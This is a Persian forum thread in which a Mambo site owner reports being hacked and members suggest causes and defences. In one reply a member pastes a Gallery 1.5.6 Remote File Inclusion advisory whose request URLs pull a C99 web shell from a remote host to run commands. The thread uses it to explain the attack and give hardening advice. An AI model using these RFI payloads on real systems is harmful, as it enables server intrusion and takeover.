سایتم دقایقی پیش هک شد

**m_s** · 06-29-2008 12:55 PM

فولدر ادمین هم پسورد داشته، بله.
خوب کامپوننت های زیادی نصبه مثل ریموستری، سایت مپ،یوزر اکستندت و ..

**تبلیغات** · 06-29-2008 12:55 PM

**Siamak** · 06-29-2008 07:43 PM

من حدس میزنم که پسورد شما با روش هایی مثل کی لاگر ها و ... دزدیده شده باشه. چون قطعا وارد شدن به شاخه Administrator ربطی به مامبو نداره

میتونید این مقاله من رو هم بخونید که شاید کمکتون کنه.

اميدوارم مورد استفاده قرار بگيره.

لطفا نظرات و پيشنهادات خودتون رو در خصوص این مقاله به من اعلام كنيد.

[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

ارادتمند.

**atoofy** · 06-29-2008 10:26 PM

سلام.سیامک جان زحمتی که کشیدین قابل تقدیره

معمولا این گونه کتاب های الکترونیک مخصوصا اگه توسط فرد یا تیم متخصصی نوشته شده باشه خیلی می تونه کمک حال بچه ها باشه.مثل همین مقاله

من که از این مقاله لذت بردم.

یــــــــــــــــــــــــ ـــــــــاعــــــــــــــ ـــــــــــــلی

**amir.d** · 06-30-2008 07:07 AM

سلام

میدونم که نباید برای تشکر پست بدم ولی کار سیامک جان فوق العاده بود.

مطالب خیلی مفیدی که برای جمع آوریش زحمت زیادی کشیده اید . واقعا عالی بود.

از مقاله خوبت ممنون . بازم از این کارا بکن

موفق باشید
امیر

**dj_ahmad** · 06-30-2008 08:28 AM

من ندیدم چه تغیراتی دادن ولی احتمال میدم که از طریق باگ این کار رو کرده باشه و یک شلر آپلود کرده!!!! به سایت های زیر نگاه کنید.
این دوستمون از smf هم استفاده کرده.
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
اینها هم قبلا توسط همین تیم هک شده

Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]

**dj_ahmad** · 06-30-2008 08:35 AM

شما ببینید کدوم دایرکتوری ها پرمیژن 777 دارن.بعد محتویاتش رو بررسی کنید.
یا اینکه یه backup بگیرید و روی لوکال با یه آنتی ویروس up to date مثل کسپر اسکای اسکن کنید چون این آنتی ویروس شل اسکریپت ها رو میشناسه.

**m_s** · 06-30-2008 07:20 PM

ببخشید یک شلر آپلود کرده یعنی چی؟
به smf چه ربطی داره
آیا هنوز هم میتونه هک کنه برای جلوگیری چه کنم

**dj_ahmad** · 07-01-2008 04:22 AM

در بسیاری از مواقع در بعضی cms ها نوعی باگ پیدا میشه با نام RFI یا remote flie inclusion و از این دست....
با استفاده از این باگ ها نفوزکر میتونه یه یه اسکریپت رو روی سرویس دهنده اجرا کنه مثلا این یه نمونه از باگ های مشهور RFI برای

################################################## ######################
################################################## ############
#gallery >> 1.5.6 Remote File Inclusion #
#Affected Software : gallery >> 1.5.6 #
#Download..: [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
heanet&filename=gallery-1.5.6.tar.gz&66134343 #
#Risk ..............: high #
#Date .........: 24/4/2007 #

################################################## ######################
################################################## ############
#Affected File:
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/setup/frame_test.php
gallery/contrib/joomla/admin.gallery.php
gallery/contrib/joomla/toolbar.gallery.php
gallery/contrib/mambo/admin.gallery.php
gallery/contrib/mambo/toolbar.gallery.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpnuke/modules.php.
gallery/contrib/phpnuke/modules.php.patch
################################################## ######################
################################################## ##############
# Exploit:
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
?cmd=ls
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.tx
t?cmd=ls
gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.
txt?cmd=ls
#
#
################################################## ######################
################################################## #############

خوب البته CMS های اپن سورس بیشتر در معرض چنین باگ های هستند.
در کدهای بالبا اگر دقت کنید C99 اسم شلری است که برای این امر انتخاب شده که اگر نفوذگر حرفه ای باشد میتواند کل سرور را غبضه کند!!!
توصیه امنیتی: از مد ها و مامبوت های غیر معتبر استفاده نکنید چرا که این باگ ها از یک خطا در کد نویسی ناشی میشود عده زیادی هستند که مامبو را گسترش میدهند ولی جمع قلیلی به موارد امنیتی کد نویسی توجه دارند
این یک روش از هزاران روش مرسوم برای نفوذگری در وب بود

یا علی

**m_s** · 07-07-2008 05:52 PM

ببخشید! برای جلوگیری الان راه حل ضد هک چیه باید چه مامبوت (غیر معتبر) را حذف کنیم

**mhadaily** · 07-07-2008 06:45 PM

مطمئنان داشتن اکستنشن های اضاقی از امنتیت سی ام اس میاره پایین این چیزی هست که خود سی ام اس هم بهتون میگه

اما هاست خوب خیلی در این موارد تاثیر گذار هست